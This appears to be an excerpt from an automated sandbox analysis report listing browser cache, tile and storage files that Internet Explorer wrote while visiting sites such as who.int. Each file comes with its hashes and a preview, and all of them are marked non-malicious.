                                                                                                                                                                    Preview: <root></root><root><item name="__sak" value="1" ltime="1511629392" htime="30877448" /></root><root></root><root></root><root></root><root><item name="__sak" value="1" ltime="1668229392" htime="30877448" /></root><root></root><root><item name="yt-remote-device-id" value="{&quot;data&quot;:&quot;16309e03-4768-44fc-a8f1-f9e6ce5f22ed&quot;,&quot;expiration&quot;:1648825501277,&quot;creation&quot;:1617289501307}" ltime="1669949392" htime="30877448" /></root><root><item name="yt-remote-device-id" value="{&quot;data&quot;:&quot;16309e03-4768-44fc-a8f1-f9e6ce5f22ed&quot;,&quot;expiration&quot;:1648825501277,&quot;creation&quot;:1617289501307}" ltime="1669949392" htime="30877448" /><item name="yt-remote-connected-devices" value="{&quot;data&quot;:&quot;[]&quot;,&quot;expiration&quot;:1617375901593,&quot;creation&quot;:1617289501593}" ltime="1671989392" htime="30877448" /></root><root><item name="yt-remote-device-id" value="{&quot;data&quot;:&quot;16309e03-4768-44fc-a8f1-f9e6ce5f22ed&quot;,&quot
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\8LV1ZCXG\www.who[1].xml
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):143829
                                                                                                                                                                    Entropy (8bit):4.515525048995759
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: <root></root><root></root><root><item name="at-rand" value="0.6325622714627502" ltime="1454229392" htime="30877448" /></root><root><item name="at-rand" value="0.6325622714627502" ltime="1454229392" htime="30877448" /><item name="at-lojson-cache-ra-5803f964fe6c9599" value="{&quot;pc&quot;:&quot;flwi,shin&quot;,&quot;customMessageTemplates&quot;:[],&quot;subscription&quot;:{&quot;active&quot;:true,&quot;edition&quot;:&quot;BASIC&quot;,&quot;tier&quot;:&quot;basic&quot;,&quot;reducedBranding&quot;:true,&quot;insightsEnabled&quot;:false},&quot;customMessageMetadata&quot;:{&quot;oauthEmailProviders&quot;:[&quot;mailchimp&quot;]},&quot;config&quot;:{&quot;_default&quot;:{&quot;widgets&quot;:{&quot;flwi&quot;:{&quot;thankyou&quot;:false,&quot;orientation&quot;:&quot;horizontal&quot;,&quot;shape&quot;:&quot;square&quot;,&quot;widgetId&quot;:&quot;970d&quot;,&quot;services&quot;:[{&quot;service&quot;:&quot;rss&quot;,&quot;usertype&quot;:&quot;user&quot;,&quot;id&quot;:&quot;http://www.who.int/a
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{918CB189-92FB-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                    File Type:Microsoft Word Document
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):32856
                                                                                                                                                                    Entropy (8bit):1.8519324045420333
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{918CB18B-92FB-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                    File Type:Microsoft Word Document
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):48412
                                                                                                                                                                    Entropy (8bit):2.700508333218304
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{AB82FDC0-92FB-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                    File Type:Microsoft Word Document
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):16984
                                                                                                                                                                    Entropy (8bit):1.5670653260950873
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:IwAGcprZGwpauG4pQOGrapbS8GQpKnG7HpRcTGIpG:rkZTQO6ABSUAGTIA
                                                                                                                                                                    MD5:13DB5EE275598324200B8C9F757385A1
                                                                                                                                                                    SHA1:8546D972C6E6D69CE93BDB374031FB9CB873C204
                                                                                                                                                                    SHA-256:D446F2F6D59DB0190CE89AE3EA5F7DA7299FC84FC963C3E77C2E1F35CFA05B45
                                                                                                                                                                    SHA-512:D18BCB8D94A08011B66317704913FC6BEC786C7373AE12CD9BFEAED2459E6903CD1CEE4FB1A18F8829DCFC420DB4A46A47FA06ED55EEB66B798045B710EB8AF4
                                                                                                                                                                    Malicious:false
                                                                                                                                                                     Preview: ....R.o.o.t. .E.n.t.r.y....
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml
                                                                                                                                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):656
                                                                                                                                                                    Entropy (8bit):5.125840918900346
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:TMHdNMNxOE8Ek6E+nWimI002EtM3MHdNMNxOE8Ek6E+nWimI00ObVbkEtMb:2d6NxOASZHKd6NxOASZ76b
                                                                                                                                                                    MD5:5817DFC0D38DE76BA0DE394C00872D03
                                                                                                                                                                    SHA1:5431811D04C527FC71FC18585C30B0D46635A555
                                                                                                                                                                    SHA-256:F65CC55D836F1E36B2C392C3DD9DE2FB5FE14AFFE2A02745B92BBFEA83434C0B
                                                                                                                                                                    SHA-512:09B9B342C1684F0B377CEDFF051919560B425451D4BC341FF11F97030DB704FF60C9E6DC36CBA45C58244B1308ACA7DCD65939662EAD39B0084647546B150697
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x75e245f6,0x01d72708</date><accdate>0x75e245f6,0x01d72708</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x75e245f6,0x01d72708</date><accdate>0x75e245f6,0x01d72708</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml
                                                                                                                                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):653
                                                                                                                                                                    Entropy (8bit):5.096817193273539
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:TMHdNMNxe2k4aSknWimI002EtM3MHdNMNxe2k4aSknWimI00Obkak6EtMb:2d6NxrWSZHKd6NxrWSZ7Aa7b
                                                                                                                                                                    MD5:C7A5C1239C4AAD74B5B3C49F72F477BA
                                                                                                                                                                    SHA1:7429E3568F99CE6D9B08FE93F0FD1DC138651A67
                                                                                                                                                                    SHA-256:BCF9E5C06B4FADFEF297F3F838A65B5492170035C6B0402DAA3224D37259AE7B
                                                                                                                                                                    SHA-512:A3AAB631A85F26ACA59A806EF1ECCCE106293D2AC135D7DE28B855DB5A3614DA2F1F4B037459310679140EE3C955440B33160A4F0F47C933D2F68291FC7DB21F
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x75db1ee8,0x01d72708</date><accdate>0x75db1ee8,0x01d72708</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x75db1ee8,0x01d72708</date><accdate>0x75db1ee8,0x01d72708</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml
                                                                                                                                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):662
                                                                                                                                                                    Entropy (8bit):5.145560032890936
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:TMHdNMNxvL8Ek6E+nWimI002EtM3MHdNMNxvL8Ek6E+nWimI00ObmZEtMb:2d6Nxv1SZHKd6Nxv1SZ7mb
                                                                                                                                                                    MD5:025A39C872F6E21737AACE2D9E492F52
                                                                                                                                                                    SHA1:8A3A086045A0D9A9EAC123CB98B175C1C138B2DB
                                                                                                                                                                    SHA-256:2440BB9B0A2D2396EA8AF2D9079505711856BA486C30B2B93FF0BE042F37C6C2
                                                                                                                                                                    SHA-512:EFED77A5AB1CC18894B89E073D4D26F3E49B4A18965E5D8E23DA442C060F5C8DE8F2A8FC13FB6EB3F8EA9F66DDF71216EE49326E4358B387A049FBA162C41A9F
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x75e245f6,0x01d72708</date><accdate>0x75e245f6,0x01d72708</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x75e245f6,0x01d72708</date><accdate>0x75e245f6,0x01d72708</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml
                                                                                                                                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):647
                                                                                                                                                                    Entropy (8bit):5.081825816431691
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:TMHdNMNxiOK4UnWimI002EtM3MHdNMNxiOK4UnWimI00Obd5EtMb:2d6NxRhUSZHKd6NxRhUSZ7Jjb
                                                                                                                                                                    MD5:B7A724BE550EA060FEE819E49385E03F
                                                                                                                                                                    SHA1:E577EE012A14B5F4A4DA4E3951A52843F9A499E6
                                                                                                                                                                    SHA-256:4A7F8266BC564B0018B92DFD80FF4924A93FD11D23A23B9042C16F646AAA7E80
                                                                                                                                                                    SHA-512:CF69E4AAB7A6BFE8EF303E4F745D94F679711CF087E3B421F09BFBEC65A14DF43850792D52578A07EE5461C5DF7277210B1A05DF13A26E022D16D0FC504CAAE0
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x75dfe370,0x01d72708</date><accdate>0x75dfe370,0x01d72708</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x75dfe370,0x01d72708</date><accdate>0x75dfe370,0x01d72708</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml
                                                                                                                                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):656
                                                                                                                                                                    Entropy (8bit):5.160603405264169
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:TMHdNMNxhGw8Ek6E+nWimI002EtM3MHdNMNxhGw8Ek6E+nWimI00Ob8K075EtMb:2d6NxQ0SZHKd6NxQ0SZ7YKajb
                                                                                                                                                                    MD5:C311F8A3088FD9396CBD1F72713A4143
                                                                                                                                                                    SHA1:9F4D25B1AA2FEC969FAD0815F991D6FF3D6EA301
                                                                                                                                                                    SHA-256:EC50C527747792DEBF632ABCCBC759EF4740915E7315177EB18C4BF471BF182F
                                                                                                                                                                    SHA-512:392ED4E9B34A3E8896B8F7858CD7089ED82684922FBAB4E84E06DFDF08F6D8C50CA3AED2A7DBA1D7D012B18BB24459EEB6D19AF54BEEDFD28C37123B939DBC67
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x75e245f6,0x01d72708</date><accdate>0x75e245f6,0x01d72708</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x75e245f6,0x01d72708</date><accdate>0x75e245f6,0x01d72708</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml
                                                                                                                                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):653
                                                                                                                                                                    Entropy (8bit):5.129156444145903
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:TMHdNMNx0n8Ek6E+nWimI002EtM3MHdNMNx0n8Ek6E+nWimI00ObxEtMb:2d6Nx0pSZHKd6Nx0pSZ7nb
                                                                                                                                                                    MD5:D21E1537C45262FE762DCDBBEE81D3B1
                                                                                                                                                                    SHA1:1315902A2F8009FC675B4B354C791DF7502D0D32
                                                                                                                                                                    SHA-256:F783FA6CA869E1609C7A1999BD3120A3D59EC7A3EBF7D4EE41B32F30CC196694
                                                                                                                                                                    SHA-512:F7193DDE93B2145C577D4774B31A384F9BD58C98D8EA90755382EF257A9E382902C24865D23456B63BD5501BCC1AC778DA207F31C60ECA2E697C07A5FEE97655
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x75e245f6,0x01d72708</date><accdate>0x75e245f6,0x01d72708</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x75e245f6,0x01d72708</date><accdate>0x75e245f6,0x01d72708</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml
                                                                                                                                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):656
                                                                                                                                                                    Entropy (8bit):5.106878372901071
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:TMHdNMNxxOK4UnWimI002EtM3MHdNMNxxOK4UnWimI00Ob6Kq5EtMb:2d6NxkhUSZHKd6NxkhUSZ7ob
                                                                                                                                                                    MD5:DF883FC66467547F947AE513EB6E5353
                                                                                                                                                                    SHA1:97C65F02348ECFBE5C5DD61171FA2D403900B46F
                                                                                                                                                                    SHA-256:955E2F5764F89C0FFB1E747F90FA50B55CD127C158331C21AE43ADC93A76D289
                                                                                                                                                                    SHA-512:9D82E9EA5F08A1F79544D591D0CE90FA2D15D9821E9727284FBBB50866F38FB075418A01E8F80ED794FA0DEACC0FE1E7523D5E400362C4B07BD760CE43EF3BB6
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x75dfe370,0x01d72708</date><accdate>0x75dfe370,0x01d72708</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x75dfe370,0x01d72708</date><accdate>0x75dfe370,0x01d72708</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml
                                                                                                                                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):659
                                                                                                                                                                    Entropy (8bit):5.0974856911490765
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:TMHdNMNxcAdVUaWdVUknWimI002EtM3MHdNMNxcAdVUaWdVUknWimI00ObVEtMb:2d6NxNdVUjdVUkSZHKd6NxNdVUjdVUkA
                                                                                                                                                                    MD5:1A0C73DE38AFB51F10C83B510FE8FC60
                                                                                                                                                                    SHA1:34DB6861EEB25568BB3440BA9871C60434EE2353
                                                                                                                                                                    SHA-256:726CDA3028D0B974A662B8C3BA4874CFB7AAA9CD9D851D2CD6AA02AD183D7D52
                                                                                                                                                                    SHA-512:F0E7E7282DE9314B3BAA73C6F04AA8F469F02F09101DA3E012564915A9642902EF741B6FDA08C2B66D0E2619BDB27DEBA995F548140A8B20F5C8A495E0AD1572
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x75dd8130,0x01d72708</date><accdate>0x75dd8130,0x01d72708</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x75dd8130,0x01d72708</date><accdate>0x75dd8130,0x01d72708</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml
                                                                                                                                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):653
                                                                                                                                                                    Entropy (8bit):5.0771196171500526
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:TMHdNMNxfnAdVUaWdVUknWimI002EtM3MHdNMNxfnAdVUaWdVUknWimI00Obe5Es:2d6NxodVUjdVUkSZHKd6NxodVUjdVUkh
                                                                                                                                                                    MD5:AF354A3F28422D41042A1438FC72A8B2
                                                                                                                                                                    SHA1:7840273D7A61648E4B04415D04F3CA354865177D
                                                                                                                                                                    SHA-256:255FCE752439FF2021DC10394116F614EFF8D921945A6EB3E41A3C10C41C0101
                                                                                                                                                                    SHA-512:F98B0EA3944BC7FB838DF1BAB7224A7F9B58C79E5C537AB73C193C2A6049C568E06D889342B9FA8B6177B725A1A386C2BAFC9764BF10FF69C463053C7FF37D13
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x75dd8130,0x01d72708</date><accdate>0x75dd8130,0x01d72708</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x75dd8130,0x01d72708</date><accdate>0x75dd8130,0x01d72708</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\ynfz0jx\imagestore.dat
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1250
                                                                                                                                                                    Entropy (8bit):5.434407934165169
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:k6OGvtoOaPQSV1WvuhHg9XGdqiZNPGFwUmSydj60pF3KVukf/:k6OGFDNuhHgEwRx5yFPpw
                                                                                                                                                                    MD5:007AF6A213563A3A57569B9C249EBA9E
                                                                                                                                                                    SHA1:98C72F0E19283BA539B8EBFCBE6D62F1B562AF6C
                                                                                                                                                                    SHA-256:AE3972A3FDBAE5CD9D79EB53DB8912F366973FCB9A8B31282085257ADB22DAFE
                                                                                                                                                                    SHA-512:0C55AB89D09761C32C20C022E8696AA5DF351F383D293C7CC272437EF777774A9254A0F710D73495E88FEE3B5B7D9C5FC0C1BC94280F66DB6EC48B49B0C2F3A9
                                                                                                                                                                    Malicious:false
                                                                                                                                                                     Preview: https://www.who.int/favicon.ico, followed by non-printable binary data
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\143.3d8bb49f121080f7c65c[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):625
                                                                                                                                                                    Entropy (8bit):4.670963210527082
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:4M9QY/V3IAQLSJw+4rnNe+AsC7hN0iIggkbInFh/El4cLaMN:zK+BVKSetrNzO77041In/El4cLaMN
                                                                                                                                                                    MD5:E60DD66238DEE35752B8B072C7180B0D
                                                                                                                                                                    SHA1:75EE09DC1914B749E778F8D31968FAC048E82B40
                                                                                                                                                                    SHA-256:2DFA62171C6667988D674799A042B576B12881C34464CB9A78FF2138ED3FAA94
                                                                                                                                                                    SHA-512:6A3799D822C16AC980B2EC875C42DC89204C3484AC5E685ECC88626491DBE40F9E91255CE3532D8A4AB31896DD85D4844C131C8CB314786CF6E452F0B69248C8
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://s7.addthis.com/static/143.3d8bb49f121080f7c65c.js
                                                                                                                                                                    Preview: atwpjp([143],{248:function(s,t){s.exports='<svg width="32" height="32" xmlns="http://www.w3.org/2000/svg"><path d="M13.73 18.974V12.57l5.945 3.212-5.944 3.192zm12.18-9.778c-.837-.908-1.775-.912-2.205-.965C20.625 8 16.007 8 16.007 8c-.01 0-4.628 0-7.708.23-.43.054-1.368.058-2.205.966-.66.692-.875 2.263-.875 2.263S5 13.303 5 15.15v1.728c0 1.845.22 3.69.22 3.69s.215 1.57.875 2.262c.837.908 1.936.88 2.426.975 1.76.175 7.482.23 7.482.15 0 .08 4.624.072 7.703-.16.43-.052 1.368-.057 2.205-.965.66-.69.875-2.262.875-2.262s.22-1.845.22-3.69v-1.73c0-1.844-.22-3.69-.22-3.69s-.215-1.57-.875-2.262z" fill-rule="evenodd"/></svg>'}});
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\176.b3b098a46f20d5583e41[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):1517
                                                                                                                                                                    Entropy (8bit):4.110829765636205
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:r4Ci+BsHyetW8NV1WXUSWkrqJfT4Aiu96WfLygeJKP56OWGZsfKMN:ETHyegM+ULfT4Ai66WfLyggKP8D
                                                                                                                                                                    MD5:4DFE77C8CEA3D79577D222E8384019F9
                                                                                                                                                                    SHA1:68B644A1B012359A978BF8171DB8DFB5B6148637
                                                                                                                                                                    SHA-256:1EA37CF08EAEA3302C373E600CCA593F353F037CB753C0214A9FC3949C10B6C6
                                                                                                                                                                    SHA-512:67906EF257FD483CFC47A0E5B3238C27373FD48A899B648985DB79A50F0A9DE9EAA8A61E2461A243D25549643E0BFB69106A2DE13068EA53433D1FA09B036B05
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://s7.addthis.com/static/176.b3b098a46f20d5583e41.js
                                                                                                                                                                    Preview: atwpjp([176],{281:function(c,a){c.exports='<svg width="32" height="32" xmlns="http://www.w3.org/2000/svg"><path d="M16.14 27a3.32 3.32 0 0 1-.17-.005 1.362 1.362 0 0 1-.11.005c-1.302 0-2.14-.63-2.948-1.24-.56-.42-1.086-.817-1.707-.927a5.176 5.176 0 0 0-.896-.08c-.526 0-.94.086-1.243.15-.183.037-.342.07-.463.07-.125 0-.262-.03-.32-.245a8.133 8.133 0 0 1-.126-.543c-.092-.45-.158-.728-.335-.757-2.067-.34-2.66-.804-2.79-1.133a.445.445 0 0 1-.033-.14.245.245 0 0 1 .195-.26c3.178-.557 4.603-4.017 4.662-4.164 0-.003.003-.007.005-.01.194-.42.232-.786.113-1.084-.218-.548-.93-.79-1.4-.948-.115-.038-.224-.075-.31-.11-.94-.397-1.018-.803-.98-1.01.062-.353.505-.6.862-.6.098 0 .185.02.258.056.422.21.803.318 1.132.318.454 0 .652-.204.676-.23-.01-.23-.026-.47-.04-.716-.095-1.6-.212-3.59.263-4.724 1.425-3.403 4.445-3.668 5.337-3.668l.39-.004h.054c.894 0 3.922.265 5.347 3.67.475 1.135.358 3.126.263 4.725l-.004.07c-.013.223-.026.44-.036.646.022.026.205.213.616.23.314-.013.673-.12 1.068-.316a.76.76 0 0 1
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\992x312-pag-coronavirus-2[1].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, progressive, precision 8, 492x312, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):35813
                                                                                                                                                                    Entropy (8bit):7.978445090692319
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:0r9bCMceSTYfhoZesWcaOFKpeXKDJhZJWBE95F2EyBtoOLHZckZ7OkK:0JbYeggCELXOFjK7ZJ995F2E8HZJZOkK
                                                                                                                                                                    MD5:DD94068BB6D8B2500E5026970AC14D17
                                                                                                                                                                    SHA1:C729CEE3005968C9DF0DF1DA3ECB108E91117FC3
                                                                                                                                                                    SHA-256:76ECDFB74830CE360BF11FA7BD533F14BD13B7B5AC7EA7B2123FAC7316FFB1C1
                                                                                                                                                                    SHA-512:7A3CAC8FD6C5DAEE4F432DC9812ABD1E9EA6FEF7AF7B88CCABE99FAD2C6600377077CBF8E24C260D96896D49789982B5DF4090489327C6F644E3869F6896E402
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/departments/child-health/992x312-pag-coronavirus-2.tmb-549v.jpg?Culture=en&sfvrsn=4da24492_7
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\992x312-pag-coronavirus-2[2].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, progressive, precision 8, 492x312, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):35813
                                                                                                                                                                    Entropy (8bit):7.978445090692319
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:0r9bCMceSTYfhoZesWcaOFKpeXKDJhZJWBE95F2EyBtoOLHZckZ7OkK:0JbYeggCELXOFjK7ZJ995F2E8HZJZOkK
                                                                                                                                                                    MD5:DD94068BB6D8B2500E5026970AC14D17
                                                                                                                                                                    SHA1:C729CEE3005968C9DF0DF1DA3ECB108E91117FC3
                                                                                                                                                                    SHA-256:76ECDFB74830CE360BF11FA7BD533F14BD13B7B5AC7EA7B2123FAC7316FFB1C1
